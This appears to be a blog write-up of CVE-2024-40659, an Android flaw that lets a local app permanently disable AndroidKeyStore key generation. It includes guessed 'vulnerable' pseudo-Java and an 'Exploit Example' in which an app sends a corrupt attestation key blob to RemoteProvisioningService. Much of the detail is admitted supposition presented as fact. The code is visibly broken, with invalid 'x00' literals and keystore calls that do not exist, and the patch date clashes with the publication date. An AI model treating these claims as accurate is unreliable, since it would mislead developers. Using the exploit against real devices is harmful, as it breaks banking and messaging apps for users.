CVE-2024-40659 - Disabling AndroidKeyStore Key Generation via Faulty Attestation Key Validation

Android’s security infrastructure greatly depends on the integrity and isolation of cryptographic keys managed by the AndroidKeyStore system. However, CVE-2024-40659 has revealed a striking vulnerability that could allow a malicious application to permanently disable the AndroidKeyStore key generation feature on a device – and it doesn’t require any user interaction or special permissions.

This long-form post will break down the issue using simple language, exclusive insights, illustrative code snippets, original references, and a hypothetical exploit demonstration.

Core Issue: Improper input validation when processing attestation key data.

- Consequence: Local apps can corrupt or update attestation keys for all installed apps, causing AndroidKeyStore to refuse further key generation requests.

The getRegistration Function

Within the Android Open Source Project (AOSP), the RemoteProvisioningService.java class is responsible for provisioning remote keys – particularly dealing with attestation key material. The critical function here is getRegistration, which validates and updates attestation key data.

Suppose the function expects a strict format or certain parameters, but these checks are either missing or weak. A malicious app could send malformed or malicious registration requests, causing the underlying keystore to accept and store corrupted attestation keys.

Simplified Code Snippet (Pseudo-Java)

// Inside RemoteProvisioningService.java
public void getRegistration(Bundle input) {
    // BAD: Missing strict input validation & attribute checks
    String alias = input.getString("attestationKeyAlias");
    byte[] keyData = input.getByteArray("attestationKeyBlob");
    // The code proceeds without rigorous sanity checks:
    KeyStore keystore = KeyStore.getInstance();
    keystore.setEntry(alias, new KeyStore.SecretKeyEntry(keyData), null);
    // ...further processing
}

Exploit Path

1. Malicious App: The attacker crafts a specially-formatted intent or API call, providing an invalid or poisoned attestation key blob.
2. Privileged API Exposure: No additional permissions are required; the app doesn’t need root or system privileges.
3. Keystore Corruption: These poisoned keys are accepted and registered under critical aliases, effectively invalidating all future key generation requests.
4. Permanent DoS: Once the keys are corrupted and stored, AndroidKeyStore will refuse to generate or provision new cryptographic keys – even a reboot or uninstall of the malicious app does not fix the issue (unless the device is wiped).

Exploit Example

*This is a conceptual and educational demonstration only.*

// Malicious app code: Disable AndroidKeyStore key generation
Intent inject = new Intent();
inject.setClassName("com.android.remoteprovisioningservice", 
    "com.android.remoteprovisioningservice.RemoteProvisioningService");

Bundle payload = new Bundle();
payload.putString("attestationKeyAlias", "default_key");
payload.putByteArray("attestationKeyBlob", createBadBlob());

// Sending the payload to the vulnerable service
inject.putExtras(payload);
context.startService(inject);

// Helper: Generate a fake/corrupt key blob
private byte[] createBadBlob() {
    return new byte[] {x00, x01, x02, x03}; // Invalid or truncated
}

After execution, any app (even legitimate ones) trying to generate new keys with AndroidKeyStore will hit failures.

Real-World Impact

- App Breakage: Banking, messaging, and security apps relying on AndroidKeyStore for cryptographic operations may suddenly fail.
- No Quick Fix: The condition persists after device reboots and app uninstalls. In most cases, only a factory reset restores functionality.

Google patched this in the June 2024 Android Security Bulletin

- Input Validation: The vulnerable API now strictly checks the attestation key alias, signatures, and blob format, preventing rogue data from being registered.
- Further Restrictions: Internal APIs have been protected against unauthorized or malformed requests.

References

- Google Android Security Bulletin—June 2024
- CVE Record for CVE-2024-40659
- AOSP Commit Fix

Summary

The CVE-2024-40659 bug is a stark reminder of how improper input validation within core Android services can lead to system-wide security failures. The ability to permanently disable AndroidKeyStore through a local attack takes this vulnerability to a whole new level. All users and developers are urged to patch their devices promptly and review any application that deals with cryptographic key registration.

Timeline

Published on: 09/11/2024 00:15:11 UTC
Last modified on: 11/04/2024 18:35:10 UTC